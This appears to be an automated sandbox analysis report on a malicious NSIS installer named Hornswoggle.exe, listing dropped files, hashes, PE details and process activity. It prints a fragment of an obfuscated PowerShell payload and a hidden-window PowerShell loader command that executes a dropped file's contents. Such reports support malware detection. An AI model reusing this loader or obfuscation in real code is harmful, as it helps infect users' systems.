                                                      Preview:L..................F........................................................;....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....h.2...........Filial195.plo.L............................................F.i.l.i.a.l.1.9.5...p.l.o.............\.....\.....\.....\.....\.F.i.l.i.a.l.1.9.5...p.l.o.A.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.c.h.i.n.a.\.M.i.x.e.r.e.n.\.v.e.r.b.a.l.i.s.e.s.\.N.i.c.h.o.l.l.s.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):52976
                                                      Entropy (8bit):5.060403679465894
                                                      Encrypted:false
                                                      SSDEEP:1536:jFZ+z30aPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKguSRIOdBlzStAHkINKeCMiYoLs:hZ+z30aPV3CNBQkj2PqiU7aVKflJnqvs
                                                      MD5:B091CFA454A65A5B67683A73974C14BD
                                                      SHA1:11D39F0D3889DCFBBD3174573129043BC5CC35BB
                                                      SHA-256:86D117EE2DBFB915F853D1B7B3BC48BF01554BDCC7F2C21312D19ADE2829F09D
                                                      SHA-512:F286D142A66CD5A89FA1281BFEDE900BD09AD67868B516294B361815F6159D4B8E2A0DE4C74AE212D17A3008EB933287E4886EF3F3C8A9DE518C69BF36D2A2E7
                                                      Malicious:false
                                                      Preview:PSMODULECACHE.G....*..n..I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):3787883
                                                      Entropy (8bit):1.4324947210684025
                                                      Encrypted:false
                                                      SSDEEP:12288:6Wkg/tbnsTltNBQ9okBin8DgNGAk5GJNl:6WfVbsTHNBQakBkJAAiGJf
                                                      MD5:410E3671969FF3F7BF648B09E60EA68A
                                                      SHA1:076217930B49D35C9618AB37A67D4D3FE4981538
                                                      SHA-256:2FE3896919449EFC149ADB77F1AA0AD437D0743EF803A3FD99784CCE6BF76D7D
                                                      SHA-512:0DB36AF5B0A8D3EEA52FB7669F81C606E38D3DCD77ADBC1292BF190B7117234A375B6DA78D7D77ED627BA64D64B44E43F9ADE496D9434CAE0EC01664D734FD05
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):6656
                                                      Entropy (8bit):4.994861218233575
                                                      Encrypted:false
                                                      SSDEEP:96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
                                                      MD5:B648C78981C02C434D6A04D4422A6198
                                                      SHA1:74D99EED1EAE76C7F43454C01CDB7030E5772FC2
                                                      SHA-256:3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
                                                      SHA-512:219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: Overheaped237.exe, Detection: malicious
                                                      • Filename: 66776676676.exe, Detection: malicious
                                                      • Filename: anziOUzZJs.exe, Detection: malicious
                                                      • Filename: SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe, Detection: malicious
                                                      • Filename: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Detection: malicious
                                                      • Filename: cuenta iban-ES65.exe, Detection: malicious
                                                      • Filename: cuenta iban-ES65.exe, Detection: malicious
                                                      • Filename: cuenta iban-ES65.exe, Detection: malicious
                                                      • Filename: cuenta iban-ES65.exe, Detection: malicious
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):947949
                                                      Entropy (8bit):0.15996398773946943
                                                      Encrypted:false
                                                      SSDEEP:768:oASe3amtYNbHv0lnDzgcAUOkEuypx/zSFad:
                                                      MD5:B34FC802327D0F5F02281FD236BD67C6
                                                      SHA1:E7E1E1E5288F16B42FB8B5A62C9B33A4B8D02341
                                                      SHA-256:1B795733FFC880D3DECD0A23BD3CCB22AC6A80EEA5729D407336D891F0523884
                                                      SHA-512:DD170F304175543B07EABE1F09D0548DBE9C332074A0493D1BC4400494356104E16D47C684EB04A04447283427612B1EAE5C40BBB42E087F77FE72C841B9DB7B
                                                      Malicious:false
                                                      Preview:..........................................................................................................................................................................................................e..................................................................................................................................................................................................................................................................... ...............................................................................................)......................................................................K...............'................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (4351), with CRLF, LF line terminators
                                                      Category:dropped
                                                      Size (bytes):73657
                                                      Entropy (8bit):5.146131456060231
                                                      Encrypted:false
                                                      SSDEEP:1536:fkZfV8us24mBZDzFYx+QgYKL+Vk2wsgCb7mb0Hh2HS8LWlVhl2LaRPUBl0EsW:fkZN/U+QZKMk2wGHh2HN6GL/Bv
                                                      MD5:905438AF78036205843C5026E99F0590
                                                      SHA1:564A4A6CAA067C24346E8E6D08EF64ECC335A85B
                                                      SHA-256:DC966CFA5212C29711424E3C044458EC1FBFA2F1F50C4A70ED301BD1CAFADF7C
                                                      SHA-512:713F380C0CE236A183E2992D722A4376625A934481F389339E6EDF57862EFCD0DBDAA004B6378138EF79BFA2DCA7223F603F2CC32865BF3C370A9DF90AA528DA
                                                      Malicious:true
                                                      Preview:$Kriss=$Kommuneplanerne41;........$Unsavories = @'. Palimb.Weritel$DepictcTAmbulatiP atoonkUdeluk rSnigmoroWirrastn Poly.reGdskninsWic thieD essagdThioscil H.chmeeLagerbertheolep=Henvisn$ UnrobiSMegsna kRe rdain Luc lld AphasieLovover;Funo,is.ImplemefR ligiou NautrunOilfirecFugti htStopursi ankbgoFristiln .lvand OpthalmMRefluo eDeterg s BundgroProtestm Nons pe Por.pot VegetarArenaeraCenterblNonsph. Chilost(Messrs $Unspea n UtilizoScourytb,rugeril SlutbeeIberegnnSemisfeeEpoxiess TristfsKautskyeSlibnins retr,c,Masterm$ProposaHSennasceSnafue,s orderslandvsei kaardeaEnticemnIgnotebeHousebrr Snoo iaEludesskHovedbgkUpbuoyiaNoncommnRegierjtFistfigeGispmisr ydbaa)Glossol Fjerntr{Arthrop.Parlame.Paroque$Foreb mUUneditadIndustrf IshmaeoTaphulslKlassehdAlexiuseHexanitlAdjoinisSulphareGarantisYoyoern Smaabor(Unec ecOAg stcou OptagntO ttowelEmanatei Ibididg Bakerlg UvisneeGromatirScaleno Bayadee' Traile NonconsNRen ezvaEbriousiEscrodtlMyrmicasClavisumInjurie$ uturgr SemilumGCoctiona Detacwl For
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1592092
                                                      Entropy (8bit):0.15888263670695008
                                                      Encrypted:false
                                                      SSDEEP:768:soeSIeBIi+CIHPx0zCnX4uXSmBKjtdYKffNFYu5bA+KNiyvYFxUT:G
                                                      MD5:B4834640DF9710A3741E667024766F83
                                                      SHA1:B392E116F95A0388B7D82C7BD453FD4B3AABE9B6
                                                      SHA-256:9091FB5A1B166D03C61848505A440E8B33ACA701DE691D7E4EB8FBFE7379FCAF
                                                      SHA-512:76396F26F236DE394EE3C2441073BF59107F61393E87D730CC70E989582361AACDAEA20E59EA49CC0F125FA6A8405823B17A5D24EC111391E83647FC3687F48C
                                                      Malicious:false
                                                      Preview:.s...................W.....................................................................................0.......................................................................................................................................................................................................~..........................................................................................................................................................................................................................................................................................................................................................2...........................................................................................j.............................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):805283
                                                      Entropy (8bit):0.1589716616809398
                                                      Encrypted:false
                                                      SSDEEP:768:nHrNCx0tE2B2CS9/Nq7r2Cr5WHOKjzQT:rt
                                                      MD5:5ACF4982DBF490AD4AE83C7D1856E89C
                                                      SHA1:66FE8A2B3323ED8CF74FBF6C681D0AA3496A6185
                                                      SHA-256:9F10026E2214CA3C9C59A9AF9913C2EF9C01AC32EFB3A7DB3A2BEC568809904C
                                                      SHA-512:B1BFB5A4FA9B1B7841254161F9347ADC44E3269D13AB7E703A2EC009B95844442E66312436835185E7779673C2E5553659BD85F4B141E5CF907EEE9198EC1F82
                                                      Malicious:false
                                                      Preview:...........................................................................................................................................................................................................................................................................................................................................................................J........\........................................................................................................................................................................................................................................................J..................................................................................M.................c.....................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):395
                                                      Entropy (8bit):4.303174937960327
                                                      Encrypted:false
                                                      SSDEEP:12:JgWpd0rRenzLLJBl8PjZQbFXEExWTCD/u:SWcrknXlKjZA2ENDm
                                                      MD5:C271D6423649C301105C8A2ECA25F9E4
                                                      SHA1:CFAC3739C43482547D096C88670FA646FB62A56C
                                                      SHA-256:E58319C2FCC8C30C70969BED761493AFD5B7F29D12FDBD1D96C0BBD93EFC6DB2
                                                      SHA-512:B04BBDBA8AFB3D93D6E10C9EA838EC3B2D3798CB0F8C383C44329FA35B4F6E72B4023FB1A6ADAFE49AF258CD876A5BB0A019C742353936EB6C60601937EAF04D
                                                      Malicious:false
                                                      Preview:crioceras shepard vildfarelserne,lg udgangsvrdiers alkaloids misaimed rabiat skihejsers seashine,impeccancy brndbarestes maskalonges strandvaskers forsikringsaftalelov sportsvognes mirlitons studieegnethedens fontina sprawled..assiento iodizing ferslevs blowbacks mementoernes sinicizing ahura zonal nedkradsende omtydet..spermatin predisable sulphureity.autofermentation symbolry recepturerets,
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):352914
                                                      Entropy (8bit):7.591142336864356
                                                      Encrypted:false
                                                      SSDEEP:6144:wWkljC//F20yoadLYF6lt3BXBQmoo2zl3iWZqfrwDgNGxSk5loGs:wWkg/tbnsTltNBQ9okBin8DgNGAk5G
                                                      MD5:DE544C52E90C1FA7AABB1A69DB241558
                                                      SHA1:659B83361313AD06448126AFB88B3C2AA17535E5
                                                      SHA-256:359A10DDC0197D90086CF74888395A1405DB03CF34FCF8C2EC98E381A21754CB
                                                      SHA-512:36BBC114177068EC2D08ED7D5792C2CC55789A4B49EA84E4CDA426F02908FA2911EE203F9E259933E0E2EA3EC5D6717C8D847DAFFE26F09B7FA39D0EB9D2332B
                                                      Malicious:false
                                                      Preview:.m...............cc.... ..88..............****...................11...oo..||||................}}......\.....................K..........FFFFFFF....................y............99999999.....,.Q...........;..........-.......Z.*.h.JJJJJ..CC............____..EEEE...........I..............77... ...ee..s..g...ww..............8........w......s.................$$...............f...888.....................F.........................m..uuu..yy.......0.,...........SSS....q.........}}}.....o..k....X.....pp.......ee..~...!!..........................k.......I.......................g.....S.......GGG.......+++....D.........O....'.............#.w.................VVVVV............E......vv...............#....?............................................fff................u...?....''''............____...gg..gg......................N.q........WW...FF...........................................&&&&&..............VV...H......................................................II.8....G.7.....................llll
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):7.743560883175848
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:Hornswoggle.exe
                                                      File size:583'720 bytes
                                                      MD5:46b874a16ba720eb5d39a0e7f9a87291
                                                      SHA1:9bc00b5338a4fef7db170cb7a8d07dbe28bd416b
                                                      SHA256:da2bc53b2715ed2d46c9ffdb184a3f926269e983981a266a7442b3e7ff6b584c
                                                      SHA512:dbffdaac2240d083406d126e63c7a7804e015b677e60f62496933b0fd1caac63ba717133e411735f27ece20e862a500cf665efdbeae89e50e93c1eae079afdf5
                                                      SSDEEP:12288:o93jlmCJYEmcj4GkV0JVLuFmbukNADu23MYlBFvZ4NP:o93jlf7JtTw6uRDu2MqjG
                                                      TLSH:D4C4E094A5664521C29E0134A6A3791EC27C9FD622E6D112EA357E33FE34BADFF40343
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........
                                                      Icon Hash:1956767870707155
                                                      Entrypoint:0x40322b
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x57956393 [Mon Jul 25 00:55:47 2016 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:4f67aeda01a0484282e8c59006b0b352
                                                      Signature Valid:false
Signature Issuer:CN=Germier, E=Eksklusivaftalerne@biconvexity.Bes, O=Germier, L=Les Marêts, OU="Klunsers Divide ", S=Île-de-France, C=FR
                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                      Error Number:-2146762487
                                                      Not Before, Not After
                                                      • 31/10/2024 11:30:46 31/10/2025 11:30:46
                                                      Subject Chain
• CN=Germier, E=Eksklusivaftalerne@biconvexity.Bes, O=Germier, L=Les Marêts, OU="Klunsers Divide ", S=Île-de-France, C=FR
                                                      Version:3
                                                      Thumbprint MD5:5E8953C033826C656D4DE7746A3A4265
                                                      Thumbprint SHA-1:DB9BA3BBAC8393AF2B0218B6D984C99744409BC3
                                                      Thumbprint SHA-256:FBBB97EA1EADF27AEC293BC0D71B5CDAFA4ABCA3754C018DE8EF40875CC0EA69
                                                      Serial:3BBC98048B20CB63E413823AB2B2398302A4A9FE
                                                      Instruction
                                                      sub esp, 00000184h
                                                      push ebx
                                                      push esi
                                                      push edi
                                                      xor ebx, ebx
                                                      push 00008001h
                                                      mov dword ptr [esp+18h], ebx
                                                      mov dword ptr [esp+10h], 00409130h
                                                      mov dword ptr [esp+20h], ebx
                                                      mov byte ptr [esp+14h], 00000020h
                                                      call dword ptr [00407120h]
                                                      call dword ptr [004070ACh]
                                                      cmp ax, 00000006h
                                                      je 00007F7E505D0B43h
                                                      push ebx
                                                      call 00007F7E505D3AC9h
                                                      cmp eax, ebx
                                                      je 00007F7E505D0B39h
                                                      push 00000C00h
                                                      call eax
                                                      mov esi, 00407298h
                                                      push esi
                                                      call 00007F7E505D3A45h
                                                      push esi
                                                      call dword ptr [004070A8h]
                                                      lea esi, dword ptr [esi+eax+01h]
                                                      cmp byte ptr [esi], bl
                                                      jne 00007F7E505D0B1Dh
                                                      push ebp
                                                      push 00000009h
                                                      call 00007F7E505D3A9Ch
                                                      push 00000007h
                                                      call 00007F7E505D3A95h
                                                      mov dword ptr [00423724h], eax
                                                      call dword ptr [00407044h]
                                                      push ebx
                                                      call dword ptr [00407288h]
                                                      mov dword ptr [004237D8h], eax
                                                      push ebx
                                                      lea eax, dword ptr [esp+38h]
                                                      push 00000160h
                                                      push eax
                                                      push ebx
                                                      push 0041ECF0h
                                                      call dword ptr [00407174h]
                                                      push 004091ECh
                                                      push 00422F20h
                                                      call 00007F7E505D36BFh
                                                      call dword ptr [004070A4h]
                                                      mov ebp, 00429000h
                                                      push eax
                                                      push ebp
                                                      call 00007F7E505D36ADh
                                                      push ebx
                                                      call dword ptr [00407154h]
                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7428 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x1bec0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x8e0f8 | 0x730 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5dc5 | 0x5e00 | 566b191b40fde4369ae73a05b57df1d2 | False | 0.6685089760638298 | data | 6.47110609300208 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1246 | 0x1400 | 6389f916226544852e494114faf192ad | False | 0.4271484375 | data | 5.0003960999706765 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1a818 | 0x400 | 72dcd89e8824ae186467be61797ed81e | False | 0.6474609375 | data | 5.220595003364983 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x24000 | 0x14000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x38000 | 0x1bec0 | 0x1c000 | 3d561cd710712943d7c2ece81602a3e4 | False | 0.42149135044642855 | data | 5.782312893766128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x382f8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.1945019519697149
RT_ICON | 0x48b20 | 0x65dd | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9937109330060974
RT_ICON | 0x4f100 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.35518672199170126
RT_ICON | 0x516a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.43363039399624764
RT_ICON | 0x52750 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.5209016393442623
RT_ICON | 0x530d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.62677304964539
RT_DIALOG | 0x53540 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x53640 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x53760 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x53828 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x53888 | 0x5a | data | English | United States | 0.7888888888888889
RT_VERSION | 0x538e8 | 0x294 | OpenPGP Secret Key | English | United States | 0.5242424242424243
RT_MANIFEST | 0x53b80 | 0x33d | XML 1.0 document, ASCII text, with very long lines (829), with no line terminators | English | United States | 0.5536791314837153
DLL | Import
KERNEL32.dll | CopyFileA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetFileAttributesA, SetFileAttributesA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, GetCurrentProcess, GetFullPathNameA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, lstrcpynA, SetErrorMode, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
                                                      No network behavior found

                                                      Target ID:0
                                                      Start time:08:46:21
                                                      Start date:02/01/2025
                                                      Path:C:\Users\user\Desktop\Hornswoggle.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Hornswoggle.exe"
                                                      Imagebase:0x400000
                                                      File size:583'720 bytes
                                                      MD5 hash:46B874A16BA720EB5D39A0E7F9A87291
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:08:46:22
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) "
                                                      Imagebase:0xc30000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
